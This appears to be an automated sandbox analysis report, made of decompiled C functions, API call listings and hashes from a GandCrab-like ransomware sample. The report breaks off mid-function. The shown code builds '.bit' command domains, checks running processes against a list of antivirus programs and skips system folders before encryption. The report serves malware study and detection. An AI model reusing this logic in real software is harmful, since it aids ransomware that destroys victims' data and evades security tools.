                                      • wsprintfW.USER32 ref: 00407438
                                      • lstrlenW.KERNEL32(?), ref: 00407446
                                      • wsprintfW.USER32 ref: 0040745A
                                      • lstrcatW.KERNEL32(?,004107D0), ref: 0040746D
                                      • lstrcatW.KERNEL32(?,004107D4), ref: 00407479
                                      • lstrlenW.KERNEL32(?), ref: 00407494
                                      • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 004074B7
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 004074DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$FreeVirtualwsprintf$AllocDiskDriveSpaceType
                                      • String ID: %I64u$%I64u/
                                      • API String ID: 1496313530-2450085969
                                      • Opcode ID: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
                                      • Instruction ID: f56a49131db2d010194e37aaef5b9fe43e36d368a28beff8943d66c84b1e197f
                                      • Opcode Fuzzy Hash: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
                                      • Instruction Fuzzy Hash: A4418371A00608AFDB219BA4CD45FAEBBF9FF48300F10442AE655F32A1DA35F950CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00404EB0() {
                                      				intOrPtr _v8;
                                      				char* _v12;
                                      				char* _v16;
                                      				char* _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				char _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v72;
                                      				WCHAR* _t26;
                                      				long _t33;
                                      				WCHAR* _t38;
                                      				signed int _t40;
                                      				signed int _t41;
                                      				void* _t46;
                                      				signed int _t50;
                                      				void* _t52;
                                      
                                      				asm("movdqa xmm0, [0x410960]");
                                      				_v20 =  &_v72;
                                      				_v16 =  &_v36;
                                      				_v36 = 0x69736d65;
                                      				_v32 = 0x74666f73;
                                      				_v28 = 0x7469622e;
                                      				_v24 = 0;
                                      				asm("movdqu [ebp-0x44], xmm0");
                                      				_v56 = 0;
                                      				_v52 = 0x646e6167;
                                      				_v48 = 0x62617263;
                                      				_v44 = 0x7469622e;
                                      				_v40 = 0;
                                      				_v12 =  &_v52;
                                      				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                      				_t38 = _t26;
                                      				if(_t38 != 0) {
                                      					_t40 = 0;
                                      					_t50 = 0;
                                      					while(1) {
                                      						_v8 =  *((intOrPtr*)(_t52 + _t50 * 4 - 0x10));
                                      						_t50 =  ==  ? 0 : _t50 + 1;
                                      						if(_t40 == 0xffffffff) {
                                      							Sleep(0x2710);
                                      						}
                                      						_t46 = VirtualAlloc(0, 2 + lstrlenW(_t38) * 2, 0x3000, 4);
                                      						_t41 = _t46;
                                      						E00404D60(_t41, _v8);
                                      						_t33 = lstrcmpiA(_t46, "fabian wosar <3");
                                      						if(_t33 != 0) {
                                      							break;
                                      						}
                                      						VirtualFree(_t46, _t33, 0x8000);
                                      						_t40 = _t41 | 0xffffffff;
                                      					}
                                      					wsprintfW(_t38, L"%S", _t46);
                                      					VirtualFree(_t46, 0, 0x8000);
                                      					_t26 = _t38;
                                      				}
                                      				return _t26;
                                      			}

























                                      0x00404eb6
                                      0x00404ecc
                                      0x00404ed7
                                      0x00404ee4
                                      0x00404eeb
                                      0x00404ef2
                                      0x00404ef9
                                      0x00404efd
                                      0x00404f02
                                      0x00404f06
                                      0x00404f0d
                                      0x00404f14
                                      0x00404f1b
                                      0x00404f1f
                                      0x00404f22
                                      0x00404f24
                                      0x00404f28
                                      0x00404f2e
                                      0x00404f30
                                      0x00404f32
                                      0x00404f37
                                      0x00404f3f
                                      0x00404f45
                                      0x00404f4c
                                      0x00404f4c
                                      0x00404f6f
                                      0x00404f71
                                      0x00404f73
                                      0x00404f7e
                                      0x00404f86
                                      0x00000000
                                      0x00000000
                                      0x00404f8f
                                      0x00404f9b
                                      0x00404f9b
                                      0x00404fa7
                                      0x00404fb8
                                      0x00404fbe
                                      0x00404fbe
                                      0x00404fc6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
                                      • Sleep.KERNEL32(00002710), ref: 00404F4C
                                      • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
                                      • VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
                                      • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404F8F
                                      • wsprintfW.USER32 ref: 00404FA7
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                      • String ID: .bit$.bit$crab$emsi$fabian wosar <3$gand$soft
                                      • API String ID: 2709691373-1090818981
                                      • Opcode ID: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
                                      • Instruction ID: 12e809f3953ca4ef3e333bd49a631b39bc1f07fb3bc4506d08caa0eda9158355
                                      • Opcode Fuzzy Hash: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
                                      • Instruction Fuzzy Hash: 34317AB1A04319ABDB11DFA4AD45BAEBBB8FB84710F10013AF701B72D1D7B45905CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E00407520(void** _a4, intOrPtr* _a8) {
                                      				signed int _v8;
                                      				long _v12;
                                      				long _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				WCHAR* _v28;
                                      				WCHAR* _v32;
                                      				WCHAR* _v36;
                                      				WCHAR* _v40;
                                      				WCHAR* _v44;
                                      				WCHAR* _v48;
                                      				WCHAR* _v52;
                                      				WCHAR* _v56;
                                      				WCHAR* _v60;
                                      				WCHAR* _v64;
                                      				WCHAR* _v68;
                                      				WCHAR* _v72;
                                      				WCHAR* _v76;
                                      				WCHAR* _v80;
                                      				void* _t46;
                                      				void* _t49;
                                      				WCHAR* _t56;
                                      				void** _t68;
                                      				void* _t75;
                                      				long _t76;
                                      				WCHAR* _t77;
                                      				signed int _t79;
                                      				void* _t83;
                                      
                                      				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      				_t68 = _a4;
                                      				 *_t68 = _t46;
                                      				_v80 = L"AVP.EXE";
                                      				_v76 = L"ekrn.exe";
                                      				_v72 = L"avgnt.exe";
                                      				_v68 = L"ashDisp.exe";
                                      				_v64 = L"NortonAntiBot.exe";
                                      				_v60 = L"Mcshield.exe";
                                      				_v56 = L"avengine.exe";
                                      				_v52 = L"cmdagent.exe";
                                      				_v48 = L"smc.exe";
                                      				_v44 = L"persfw.exe";
                                      				_v40 = L"pccpfw.exe";
                                      				_v36 = L"fsguiexe.exe";
                                      				_v32 = L"cfp.exe";
                                      				_v28 = L"msmpeng.exe";
                                      				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
                                      				_v24 = _t75;
                                      				if(_t75 == 0) {
                                      					L3:
                                      					return 0;
                                      				} else {
                                      					 *_t75 = 0x22c;
                                      					_t49 = CreateToolhelp32Snapshot(2, 0);
                                      					_v20 = _t49;
                                      					if(_t49 != 0xffffffff) {
                                      						_t79 = 0;
                                      						_push(_t75);
                                      						_v12 = 0;
                                      						_a4 = 0;
                                      						_v16 = 0;
                                      						_v8 = 0;
                                      						if(Process32FirstW(_t49) != 0) {
                                      							L6:
                                      							while(_t79 == 0) {
                                      								_t77 = _t75 + 0x24;
                                      								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                      									_t79 = _t79 + 1;
                                      									if(_t79 < 0xe) {
                                      										continue;
                                      									} else {
                                      										_t79 = _v8;
                                      									}
                                      									L15:
                                      									_t75 = _v24;
                                      									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
                                      										goto L6;
                                      									}
                                      									goto L17;
                                      								}
                                      								_push(_t77);
                                      								_push( *_t68);
                                      								_v16 = 1;
                                      								if(_a4 != 0) {
                                      									lstrcatW();
                                      									lstrcatW( *_t68, ",");
                                      								} else {
                                      									lstrcpyW();
                                      									lstrcatW( *_t68, ",");
                                      								}
                                      								_a4 =  &(_a4[0]);
                                      								_v12 = _v12 + lstrlenW(_t77) * 2;
                                      								_t79 =  >  ? 1 : _v8;
                                      								_v8 = _t79;
                                      								goto L15;
                                      							}
                                      							L17:
                                      							if(_v16 != 0) {
                                      								_t56 =  *_t68;
                                      								if( *_t56 != 0) {
                                      									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                      								}
                                      							}
                                      							 *_a8 = _v12;
                                      						}
                                      						VirtualFree(_t75, 0, 0x8000);
                                      						CloseHandle(_v20);
                                      						_t76 = _v16;
                                      						if(_t76 == 0) {
                                      							VirtualFree( *_t68, _t76, 0x8000);
                                      						}
                                      						return _t76;
                                      					} else {
                                      						VirtualFree(_t75, 0, 0x8000);
                                      						goto L3;
                                      					}
                                      				}
                                      			}































                                      0x0040753d
                                      0x0040753f
                                      0x0040754d
                                      0x0040754f
                                      0x00407556
                                      0x0040755d
                                      0x00407564
                                      0x0040756b
                                      0x00407572
                                      0x00407579
                                      0x00407580
                                      0x00407587
                                      0x0040758e
                                      0x00407595
                                      0x0040759c
                                      0x004075a3
                                      0x004075aa
                                      0x004075b3
                                      0x004075b5
                                      0x004075ba
                                      0x004075e4
                                      0x004075ea
                                      0x004075bc
                                      0x004075c0
                                      0x004075c6
                                      0x004075cc
                                      0x004075d2
                                      0x004075ef
                                      0x004075f1
                                      0x004075f3
                                      0x004075f6
                                      0x004075f9
                                      0x004075fc
                                      0x00407607
                                      0x00000000
                                      0x00407610
                                      0x00407618
                                      0x00407620
                                      0x0040762f
                                      0x00407633
                                      0x00000000
                                      0x00407635
                                      0x00407635
                                      0x00407635
                                      0x00407697
                                      0x00407697
                                      0x004076a6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004076a6
                                      0x0040763e
                                      0x0040763f
                                      0x00407641
                                      0x00407648
                                      0x00407665
                                      0x0040766e
                                      0x0040764a
                                      0x0040764a
                                      0x00407657
                                      0x00407657
                                      0x00407670
                                      0x0040768e
                                      0x00407691
                                      0x00407694
                                      0x00000000
                                      0x00407694
                                      0x004076b7
                                      0x004076bb
                                      0x004076bd
                                      0x004076c3
                                      0x004076d0
                                      0x004076d0
                                      0x004076c3
                                      0x004076db
                                      0x004076db
                                      0x004076eb
                                      0x004076f0
                                      0x004076f6
                                      0x004076fb
                                      0x00407705
                                      0x00407705
                                      0x0040770f
                                      0x004075d4
                                      0x004075dc
                                      0x00000000
                                      0x004075dc
                                      0x004075d2

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0040753D
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 004075B1
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004075C6
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004075DC
                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 004075FF
                                      • lstrcmpiW.KERNEL32(004107DC,-00000024), ref: 00407625
                                      • Process32NextW.KERNEL32(?,?), ref: 0040769E
                                      • GetLastError.KERNEL32 ref: 004076A8
                                      • lstrlenW.KERNEL32(00000000), ref: 004076C6
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004076EB
                                      • CloseHandle.KERNEL32(?), ref: 004076F0
                                      • VirtualFree.KERNEL32(?,?,00008000), ref: 00407705
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
                                      • String ID:
                                      • API String ID: 2470459410-0
                                      • Opcode ID: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
                                      • Instruction ID: 1c74ff85e4bbe89c11da167877251bfadadfb1b789393fb2674ad8a1102b1764
                                      • Opcode Fuzzy Hash: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
                                      • Instruction Fuzzy Hash: DF514D71E04218ABDB109F98DD48B9E7BB4FF85720F20806AE505BB290C7B56D85CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 15%
                                      			E00406110(void* __ecx) {
                                      				void* _t9;
                                      				intOrPtr* _t20;
                                      				void* _t42;
                                      				void* _t45;
                                      
                                      				_t42 = __ecx;
                                      				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
                                      				if(E00407BA0(_t42, L"\\ProgramData\\") != 0 || E00407BA0(_t42, L"\\Program Files\\") != 0 || E00407BA0(_t42, L"\\Tor Browser\\") != 0 || E00407BA0(_t42, L"Ransomware") != 0 || E00407BA0(_t42, L"\\All Users\\") != 0) {
                                      					L15:
                                      					VirtualFree(_t45, 0, 0x8000);
                                      					return 0;
                                      				} else {
                                      					_t9 = E00407BA0(_t42, L"\\Local Settings\\");
                                      					if(_t9 != 0) {
                                      						goto L15;
                                      					} else {
                                      						_t20 = __imp__SHGetSpecialFolderPathW;
                                      						_push(_t9);
                                      						_push(0x2a);
                                      						_push(_t45);
                                      						_push(_t9);
                                      						if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      							_push(0);
                                      							_push(0x2b);
                                      							_push(_t45);
                                      							_push(0);
                                      							if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      								_push(0);
                                      								_push(0x24);
                                      								_push(_t45);
                                      								_push(0);
                                      								if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      									_push(0);
                                      									_push(0x1c);
                                      									_push(_t45);
                                      									_push(0);
                                      									if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      										VirtualFree(_t45, 0, 0x8000);
                                      										return 1;
                                      									} else {
                                      										goto L15;
                                      									}
                                      								} else {
                                      									goto L15;
                                      								}
                                      							} else {
                                      								goto L15;
                                      							}
                                      						} else {
                                      							goto L15;
                                      						}
                                      					}
                                      				}
                                      			}







                                      0x00406121
                                      0x00406130
                                      0x00406139
                                      0x00406228
                                      0x00406231
                                      0x0040623c
                                      0x0040618f
                                      0x00406196
                                      0x0040619d
                                      0x00000000
                                      0x004061a3
                                      0x004061a3
                                      0x004061a9
                                      0x004061aa
                                      0x004061ac
                                      0x004061ad
                                      0x004061b2
                                      0x004061c1
                                      0x004061c3
                                      0x004061c5
                                      0x004061c6
                                      0x004061cc
                                      0x004061db
                                      0x004061dd
                                      0x004061df
                                      0x004061e0
                                      0x004061e6
                                      0x004061f5
                                      0x004061f7
                                      0x004061f9
                                      0x004061fa
                                      0x00406200
                                      0x0040621c
                                      0x00406227
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004061b2
                                      0x0040619d

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 00406231
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                      • String ID: Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                      • API String ID: 1363212851-106008693
                                      • Opcode ID: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
                                      • Instruction ID: f4f5e37f6e05bfd3754b73729b88660f17dd9cd9e6b304112d3c6a2927df81c1
                                      • Opcode Fuzzy Hash: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
                                      • Instruction Fuzzy Hash: F4213D3078021233EA2031662D6AB7F299E8BD5749F55447BBA02FA3C5FEBCEC15425D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00406BA0(intOrPtr* __ecx) {
                                      				int _t42;
                                      				int _t48;
                                      				int _t51;
                                      				int _t54;
                                      				int _t57;
                                      				int _t60;
                                      				int _t63;
                                      				int _t66;
                                      				int _t70;
                                      				int _t72;
                                      				void* _t75;
                                      				intOrPtr* _t86;
                                      				int _t88;
                                      				int _t89;
                                      				int _t90;
                                      				int _t91;
                                      				int _t92;
                                      				int _t93;
                                      				int _t94;
                                      				void* _t95;
                                      
                                      				_t40 = lstrlenW;
                                      				_t86 = __ecx;
                                      				_t75 = 0;
                                      				if( *__ecx != 0) {
                                      					_t72 = lstrlenW( *(__ecx + 8));
                                      					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                      					_t40 = lstrlenW;
                                      					_t75 = _t3 + _t72;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                      					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                      					_t70 = lstrlenW( *(_t86 + 0x10));
                                      					_t7 = _t95 + 4; // 0x4
                                      					_t75 = _t7 + _t70 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                      					_t94 = lstrlenW( *(_t86 + 0x20));
                                      					_t66 = lstrlenW( *(_t86 + 0x1c));
                                      					_t11 = _t94 + 4; // 0x4
                                      					_t75 = _t11 + _t66 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                      					_t93 = lstrlenW( *(_t86 + 0x2c));
                                      					_t63 = lstrlenW( *(_t86 + 0x28));
                                      					_t15 = _t93 + 4; // 0x4
                                      					_t75 = _t15 + _t63 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                      					_t92 = lstrlenW( *(_t86 + 0x38));
                                      					_t60 = lstrlenW( *(_t86 + 0x34));
                                      					_t19 = _t92 + 4; // 0x4
                                      					_t75 = _t19 + _t60 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                      					_t91 = lstrlenW( *(_t86 + 0x44));
                                      					_t57 = lstrlenW( *(_t86 + 0x40));
                                      					_t23 = _t91 + 4; // 0x4
                                      					_t75 = _t23 + _t57 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                      					_t90 = lstrlenW( *(_t86 + 0x50));
                                      					_t54 = lstrlenW( *(_t86 + 0x4c));
                                      					_t27 = _t90 + 4; // 0x4
                                      					_t75 = _t27 + _t54 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                      					_t89 = lstrlenW( *(_t86 + 0x5c));
                                      					_t51 = lstrlenW( *(_t86 + 0x58));
                                      					_t31 = _t89 + 4; // 0x4
                                      					_t75 = _t31 + _t51 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                      					_t75 = _t75 + 0x14;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                      					_t88 = lstrlenW( *(_t86 + 0x7c));
                                      					_t48 = lstrlenW( *(_t86 + 0x78));
                                      					_t36 = _t88 + 4; // 0x4
                                      					_t75 = _t36 + _t48 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                      					return _t75;
                                      				} else {
                                      					_t42 = lstrlenW( *(_t86 + 0x88));
                                      					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
                                      				}
                                      			}























                                      0x00406ba0
                                      0x00406ba8
                                      0x00406baa
                                      0x00406bae
                                      0x00406bb3
                                      0x00406bc1
                                      0x00406bc4
                                      0x00406bc9
                                      0x00406bc9
                                      0x00406bcf
                                      0x00406bd9
                                      0x00406be0
                                      0x00406be4
                                      0x00406be7
                                      0x00406be7
                                      0x00406bed
                                      0x00406bfb
                                      0x00406bfd
                                      0x00406c05
                                      0x00406c08
                                      0x00406c08
                                      0x00406c0e
                                      0x00406c1c
                                      0x00406c1e
                                      0x00406c26
                                      0x00406c29
                                      0x00406c29
                                      0x00406c2f
                                      0x00406c3d
                                      0x00406c3f
                                      0x00406c47
                                      0x00406c4a
                                      0x00406c4a
                                      0x00406c50
                                      0x00406c5e
                                      0x00406c60
                                      0x00406c68
                                      0x00406c6b
                                      0x00406c6b
                                      0x00406c71
                                      0x00406c7f
                                      0x00406c81
                                      0x00406c89
                                      0x00406c8c
                                      0x00406c8c
                                      0x00406c92
                                      0x00406ca0
                                      0x00406ca2
                                      0x00406caa
                                      0x00406cad
                                      0x00406cad
                                      0x00406cb3
                                      0x00406cb5
                                      0x00406cb5
                                      0x00406cbc
                                      0x00406cca
                                      0x00406ccc
                                      0x00406cd4
                                      0x00406cd7
                                      0x00406cd7
                                      0x00406ce0
                                      0x00406d0c
                                      0x00406ce2
                                      0x00406ce8
                                      0x00406d06
                                      0x00406d06

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                      • lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CE8
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CF6
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID:
                                      • API String ID: 1659193697-0
                                      • Opcode ID: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
                                      • Instruction ID: 0763c41813d47cec7f7f3bb87dd63c09dcdfaa37f7dde6f7b674e60aab311cac
                                      • Opcode Fuzzy Hash: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
                                      • Instruction Fuzzy Hash: BA412B32200611EFD7125FB8DE8C796BBB2FF04315F094539E416A2A62D775AC78DB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405270(WCHAR* __ecx) {
                                      				CHAR* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _t22;
                                      				void* _t24;
                                      				signed int _t26;
                                      				int _t30;
                                      				char _t32;
                                      				void* _t33;
                                      				signed char _t34;
                                      				CHAR* _t36;
                                      				WCHAR* _t37;
                                      				WCHAR* _t38;
                                      				void* _t39;
                                      				CHAR* _t40;
                                      
                                      				_t37 = __ecx;
                                      				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                      				_v20 = _t39;
                                      				GetModuleFileNameW(0, _t39, 0x200);
                                      				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
                                      				_v16 = _t33;
                                      				if(_t33 != 0xffffffff) {
                                      					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
                                      					_v24 = _t22;
                                      					if(_t22 != 0) {
                                      						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
                                      						_v12 = _t24;
                                      						if(_t24 != 0) {
                                      							_t5 = _t24 + 0x4e; // 0x4e
                                      							_t40 = _t5;
                                      							_v8 = _t40;
                                      							_t26 = lstrlenW(_t37);
                                      							_t34 = 0;
                                      							_t38 =  &(_t37[_t26]);
                                      							if(lstrlenA(_t40) + _t27 != 0) {
